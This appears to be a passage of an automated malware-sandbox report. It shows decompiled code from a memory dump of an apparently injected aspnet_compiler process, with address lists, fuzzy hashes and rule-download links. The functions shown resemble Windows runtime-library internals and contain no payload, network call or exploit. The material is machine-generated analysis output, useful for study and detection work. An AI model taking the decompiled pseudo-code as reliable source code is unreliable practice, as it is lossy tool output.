										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E011B7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E01217016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0122FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x1285350;
							if(_t109 != 0x1285350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0122FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E01225720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                                                        0x01192d8a
                                                                                        0x01192d8a
                                                                                        0x01192d92
                                                                                        0x01192d96
                                                                                        0x01192d9e
                                                                                        0x01192da0
                                                                                        0x01192da3
                                                                                        0x01192da5
                                                                                        0x01192da8
                                                                                        0x01192dab
                                                                                        0x01192db2
                                                                                        0x011ef9aa
                                                                                        0x011ef9ab
                                                                                        0x011ef9ae
                                                                                        0x011ef9ae
                                                                                        0x01192db8
                                                                                        0x01192dc2
                                                                                        0x011ef9b9
                                                                                        0x011ef9be
                                                                                        0x011ef9bf
                                                                                        0x011ef9bf
                                                                                        0x01192dcf
                                                                                        0x011ef9c9
                                                                                        0x01192dd5
                                                                                        0x01192dd5
                                                                                        0x01192dd5
                                                                                        0x01192dde
                                                                                        0x01192de1
                                                                                        0x01192e70
                                                                                        0x01192e72
                                                                                        0x01192e72
                                                                                        0x01192de7
                                                                                        0x01192deb
                                                                                        0x01192e7c
                                                                                        0x01192e83
                                                                                        0x01192e85
                                                                                        0x01192e8b
                                                                                        0x01192e8d
                                                                                        0x01192e92
                                                                                        0x01192e92
                                                                                        0x01192e85
                                                                                        0x01192df1
                                                                                        0x01192df7
                                                                                        0x01192df9
                                                                                        0x01192df9
                                                                                        0x01192dfc
                                                                                        0x01192dff
                                                                                        0x01192e02
                                                                                        0x00000000
                                                                                        0x01192e05
                                                                                        0x01192e0c
                                                                                        0x011ef9d9
                                                                                        0x01192e12
                                                                                        0x01192e12
                                                                                        0x01192e12
                                                                                        0x01192e1a
                                                                                        0x011ef9e3
                                                                                        0x011ef9e9
                                                                                        0x011ef9f0
                                                                                        0x011ef9f6
                                                                                        0x011ef9f8
                                                                                        0x011ef9f8
                                                                                        0x011ef9f0
                                                                                        0x01192e23
                                                                                        0x011efa02
                                                                                        0x011efa03
                                                                                        0x011efa05
                                                                                        0x011efa06
                                                                                        0x00000000
                                                                                        0x01192e29
                                                                                        0x01192e29
                                                                                        0x01192e2e
                                                                                        0x01192e34
                                                                                        0x01192e3e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01192e44
                                                                                        0x01192e47
                                                                                        0x01192e4d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01192e4f
                                                                                        0x01192e54
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01192e5a
                                                                                        0x01192e5f
                                                                                        0x01192e9a
                                                                                        0x01192ea4
                                                                                        0x01192ea5
                                                                                        0x01192ea8
                                                                                        0x01192eaf
                                                                                        0x01192eb2
                                                                                        0x01192eb5
                                                                                        0x011efae9
                                                                                        0x011efaeb
                                                                                        0x011efaed
                                                                                        0x011efaef
                                                                                        0x011efaf7
                                                                                        0x011efaf8
                                                                                        0x011efafd
                                                                                        0x011efaff
                                                                                        0x011efb04
                                                                                        0x011efb04
                                                                                        0x011efaff
                                                                                        0x01192ec0
                                                                                        0x01192ec4
                                                                                        0x01192ec6
                                                                                        0x01192ec8
                                                                                        0x011efb14
                                                                                        0x011efb18
                                                                                        0x011efb1e
                                                                                        0x011efb21
                                                                                        0x011efb21
                                                                                        0x01192ece
                                                                                        0x01192ece
                                                                                        0x01192ece
                                                                                        0x01192ed7
                                                                                        0x01192e61
                                                                                        0x01192e63
                                                                                        0x011efa6b
                                                                                        0x011efa71
                                                                                        0x011efa76
                                                                                        0x011efa78
                                                                                        0x011efa8a
                                                                                        0x011efa7a
                                                                                        0x011efa83
                                                                                        0x011efa83
                                                                                        0x011efa8f
                                                                                        0x011efa91
                                                                                        0x011efa97
                                                                                        0x011efa9d
                                                                                        0x011efaa4
                                                                                        0x011efaaa
                                                                                        0x011efaaf
                                                                                        0x011efab1
                                                                                        0x011efac3
                                                                                        0x011efab3
                                                                                        0x011efabc
                                                                                        0x011efabc
                                                                                        0x011efac8
                                                                                        0x011efacb
                                                                                        0x011efadf
                                                                                        0x011efadf
                                                                                        0x011efacb
                                                                                        0x011efaa4
                                                                                        0x011efa91
                                                                                        0x01192e6f
                                                                                        0x01192e6f
                                                                                        0x01192e5f
                                                                                        0x011efa13
                                                                                        0x011efa15
                                                                                        0x011efa17
                                                                                        0x011efa1f
                                                                                        0x011efa21
                                                                                        0x011efa22
                                                                                        0x011efa25
                                                                                        0x011efa28
                                                                                        0x011efa2f
                                                                                        0x011efa2f
                                                                                        0x011efa2a
                                                                                        0x011efa2a
                                                                                        0x011efa2a
                                                                                        0x011efa31
                                                                                        0x011efa34
                                                                                        0x011efa36
                                                                                        0x011efa3c
                                                                                        0x011efa3e
                                                                                        0x011efa41
                                                                                        0x011efa43
                                                                                        0x011efa45
                                                                                        0x011efa45
                                                                                        0x011efa41
                                                                                        0x011efa3c
                                                                                        0x011efa4a
                                                                                        0x011efa4f
                                                                                        0x011efa51
                                                                                        0x011efa53
                                                                                        0x011efa56
                                                                                        0x011efa5b
                                                                                        0x011efa5e
                                                                                        0x00000000
                                                                                        0x011efa5e
                                                                                        0x01192e23

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: RTL: Re-Waiting
                                                                                        • API String ID: 0-316354757
                                                                                        • Opcode ID: c9e33c4cb78fa962698ab7808482a5b80f2ead057a35442b503d56262c701269
                                                                                        • Instruction ID: e0f5d650478de305891a829afb9b31628f74b645b88594982eff37eb19e36b51
                                                                                        • Opcode Fuzzy Hash: c9e33c4cb78fa962698ab7808482a5b80f2ead057a35442b503d56262c701269
                                                                                        • Instruction Fuzzy Hash: 1E614931A00A16AFEF3EDFACC888B7E77E4EB80714F150555E9219B2C1D7349901C781
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01260EA5 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 80%
                                                                                        			E01260EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0125FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E01261074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E011D9730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0125A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0125A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x1288b04 >> 0x14) + (_v44 -  *0x1288b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E011B7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0125138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E011B7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0124FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x1288724 & 0x00000008) != 0) {
						E012552F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E012615B5(0x1288ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                                                        0x01260eb7
                                                                                        0x01260eb9
                                                                                        0x01260ec0
                                                                                        0x01260ec2
                                                                                        0x01260ecd
                                                                                        0x0126105b
                                                                                        0x0126105b
                                                                                        0x01261061
                                                                                        0x01261066
                                                                                        0x01261066
                                                                                        0x0126106b
                                                                                        0x01261073
                                                                                        0x01261073
                                                                                        0x01260ed3
                                                                                        0x01260ed6
                                                                                        0x01260edc
                                                                                        0x01260ee0
                                                                                        0x01260ee7
                                                                                        0x01260ef0
                                                                                        0x01260ef5
                                                                                        0x01260efa
                                                                                        0x01260efc
                                                                                        0x01260efd
                                                                                        0x01260f03
                                                                                        0x01260f04
                                                                                        0x01260f06
                                                                                        0x01260f07
                                                                                        0x01260f09
                                                                                        0x01260f0e
                                                                                        0x01260f14
                                                                                        0x01260f23
                                                                                        0x01260f2d
                                                                                        0x01260f34
                                                                                        0x01260f34
                                                                                        0x01260f14
                                                                                        0x01260f52
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01260f58
                                                                                        0x01260f73
                                                                                        0x01260f74
                                                                                        0x01260f79
                                                                                        0x01260f7d
                                                                                        0x01260f80
                                                                                        0x01260f86
                                                                                        0x01260fab
                                                                                        0x01260fb5
                                                                                        0x01260fc6
                                                                                        0x01260fd1
                                                                                        0x01260fe3
                                                                                        0x01260fd3
                                                                                        0x01260fdc
                                                                                        0x01260fdc
                                                                                        0x01260feb
                                                                                        0x01261009
                                                                                        0x01261009
                                                                                        0x01261015
                                                                                        0x01261027
                                                                                        0x01261017
                                                                                        0x01261020
                                                                                        0x01261020
                                                                                        0x0126102f
                                                                                        0x0126103c
                                                                                        0x0126103c
                                                                                        0x01261048
                                                                                        0x01261050
                                                                                        0x01261050
                                                                                        0x01261055
                                                                                        0x00000000
                                                                                        0x01261055
                                                                                        0x01260f88
                                                                                        0x01260f9e
                                                                                        0x01260fa2
                                                                                        0x01260fa9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01260fa9
                                                                                        0x00000000

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: `
                                                                                        • API String ID: 0-2679148245
                                                                                        • Opcode ID: d16c77e2a13fdc17bdcbc9e4c995a7cd25c6269477a6cfe3afb814f6eb1b4013
                                                                                        • Instruction ID: a9c7c44c496292d6311e5b513724efb7bec1737c157c467b9e1a20f40fdb3012
                                                                                        • Opcode Fuzzy Hash: d16c77e2a13fdc17bdcbc9e4c995a7cd25c6269477a6cfe3afb814f6eb1b4013
                                                                                        • Instruction Fuzzy Hash: 93519D713143429BD725DF28D985B2BBBE9EBC4714F04092CFA96872D0D670E845C762
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011CF0BF Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 75%
                                                                                        			E011CF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E011B4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E011D9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E011D9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E011D95D0();
							goto L11;
						} else {
							_t109 = L011B4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E011DF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E011D95D0();
										L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                                                        0x011cf0d3
                                                                                        0x011cf0d9
                                                                                        0x011cf0e0
                                                                                        0x011cf0e7
                                                                                        0x011cf0f2
                                                                                        0x011cf0f4
                                                                                        0x011cf0f8
                                                                                        0x011cf100
                                                                                        0x011cf108
                                                                                        0x011cf10d
                                                                                        0x011cf115
                                                                                        0x011cf116
                                                                                        0x011cf11f
                                                                                        0x011cf123
                                                                                        0x011cf124
                                                                                        0x011cf12c
                                                                                        0x011cf130
                                                                                        0x011cf134
                                                                                        0x011cf13d
                                                                                        0x011cf144
                                                                                        0x011cf14b
                                                                                        0x011cf152
                                                                                        0x0120bab0
                                                                                        0x0120bab0
                                                                                        0x011cf158
                                                                                        0x011cf158
                                                                                        0x011cf15a
                                                                                        0x011cf160
                                                                                        0x011cf165
                                                                                        0x011cf166
                                                                                        0x011cf16f
                                                                                        0x011cf173
                                                                                        0x0120baa7
                                                                                        0x0120baa7
                                                                                        0x0120baab
                                                                                        0x00000000
                                                                                        0x011cf179
                                                                                        0x011cf18d
                                                                                        0x011cf191
                                                                                        0x0120baa2
                                                                                        0x00000000
                                                                                        0x011cf197
                                                                                        0x011cf19b
                                                                                        0x011cf1a2
                                                                                        0x011cf1a9
                                                                                        0x011cf1af
                                                                                        0x011cf1b2
                                                                                        0x011cf1b6
                                                                                        0x011cf1b9
                                                                                        0x011cf1c4
                                                                                        0x011cf1d8
                                                                                        0x011cf1df
                                                                                        0x011cf1e3
                                                                                        0x011cf1eb
                                                                                        0x011cf1ee
                                                                                        0x011cf1f4
                                                                                        0x011cf20f
                                                                                        0x0120bab7
                                                                                        0x0120babb
                                                                                        0x0120bacc
                                                                                        0x0120bad1
                                                                                        0x011cf215
                                                                                        0x011cf218
                                                                                        0x011cf226
                                                                                        0x011cf22b
                                                                                        0x00000000
                                                                                        0x011cf22b
                                                                                        0x011cf1f6
                                                                                        0x011cf1f6
                                                                                        0x011cf1f9
                                                                                        0x011cf1fb
                                                                                        0x011cf1fb
                                                                                        0x011cf1f4
                                                                                        0x011cf191
                                                                                        0x011cf173
                                                                                        0x011cf152
                                                                                        0x011cf203

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @
                                                                                        • API String ID: 0-2766056989
                                                                                        • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                        • Instruction ID: bfb7ee9bf8c6bd22ddb3fd44ba3de81c87da31e1552e0cfc54336f3dc74808d6
                                                                                        • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                        • Instruction Fuzzy Hash: 6851AD71504711AFC325DF18C840A6BBBF9FF98B14F008A2EFA9587690E7B4E945CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01213540 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 75%
                                                                                        			E01213540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x128d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E011D0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E01213706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E011DFA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E01213540;
						E011DFA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E011EDDD0( &_v1072, _t75, _t79, _t80, _t81);
						E01220C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E011D97C0();
					}
					return E011DB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E01213971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E01213884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E011DFA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E011D9650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E01213787(_a4,  &_v352, _t80);
						}
					}
					L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E011D95D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                                                        0x01213552
                                                                                        0x0121355a
                                                                                        0x0121355d
                                                                                        0x01213566
                                                                                        0x01213567
                                                                                        0x0121357e
                                                                                        0x0121358f
                                                                                        0x012135a1
                                                                                        0x012135a5
                                                                                        0x0121366b
                                                                                        0x0121366b
                                                                                        0x0121366d
                                                                                        0x01213672
                                                                                        0x01213679
                                                                                        0x01213685
                                                                                        0x0121368d
                                                                                        0x0121369d
                                                                                        0x012136a7
                                                                                        0x012136b8
                                                                                        0x012136c6
                                                                                        0x012136c7
                                                                                        0x012136dc
                                                                                        0x012136e1
                                                                                        0x012136e7
                                                                                        0x012136e9
                                                                                        0x012136e9
                                                                                        0x01213703
                                                                                        0x01213703
                                                                                        0x012135b5
                                                                                        0x012135c0
                                                                                        0x012135c4
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x012135ca
                                                                                        0x012135d7
                                                                                        0x012135e2
                                                                                        0x012135e6
                                                                                        0x012135e8
                                                                                        0x012135f5
                                                                                        0x012135fa
                                                                                        0x01213603
                                                                                        0x01213604
                                                                                        0x01213609
                                                                                        0x0121360a
                                                                                        0x01213612
                                                                                        0x01213613
                                                                                        0x0121361e
                                                                                        0x01213622
                                                                                        0x01213628
                                                                                        0x0121362f
                                                                                        0x0121362f
                                                                                        0x01213636
                                                                                        0x01213638
                                                                                        0x0121363b
                                                                                        0x01213642
                                                                                        0x01213642
                                                                                        0x01213636
                                                                                        0x01213657
                                                                                        0x01213657
                                                                                        0x0121365c
                                                                                        0x01213662
                                                                                        0x01213669
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: BinaryHash
                                                                                        • API String ID: 0-2202222882
                                                                                        • Opcode ID: 3845293ff3ac97e11245273d6a10b188404acbb7a72ee5104f29fb7bad543b50
                                                                                        • Instruction ID: e0cdce9cd0bd564e383cbdfe1e08cdbfeab51e0fb5189a682c3a832dc2bdfe8d
                                                                                        • Opcode Fuzzy Hash: 3845293ff3ac97e11245273d6a10b188404acbb7a72ee5104f29fb7bad543b50
                                                                                        • Instruction Fuzzy Hash: B74144B1D1056D9EDB21DA50CC84FAEB77DAB54728F0045A5EA09AB240DB309E89CF98
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 012605AC Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 71%
                                                                                        			E012605AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E012607DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E011D9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0125A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0125A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E01261293(_t79, _v40, E012607DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E011B7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0125138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                                                                        0x012605c5
                                                                                        0x012605ca
                                                                                        0x012605d3
                                                                                        0x012606db
                                                                                        0x012606db
                                                                                        0x012606dd
                                                                                        0x012606e3
                                                                                        0x012606e3
                                                                                        0x012605dd
                                                                                        0x012605e7
                                                                                        0x012605f6
                                                                                        0x01260600
                                                                                        0x01260607
                                                                                        0x01260610
                                                                                        0x01260615
                                                                                        0x0126061a
                                                                                        0x0126061c
                                                                                        0x0126061e
                                                                                        0x01260624
                                                                                        0x01260625
                                                                                        0x01260627
                                                                                        0x01260628
                                                                                        0x01260631
                                                                                        0x01260640
                                                                                        0x0126064d
                                                                                        0x01260654
                                                                                        0x01260654
                                                                                        0x01260631
                                                                                        0x0126066d
                                                                                        0x01260674
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01260692
                                                                                        0x0126069e
                                                                                        0x012606b0
                                                                                        0x012606a0
                                                                                        0x012606a9
                                                                                        0x012606a9
                                                                                        0x012606b8
                                                                                        0x012606d6
                                                                                        0x012606d6
                                                                                        0x00000000

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: `
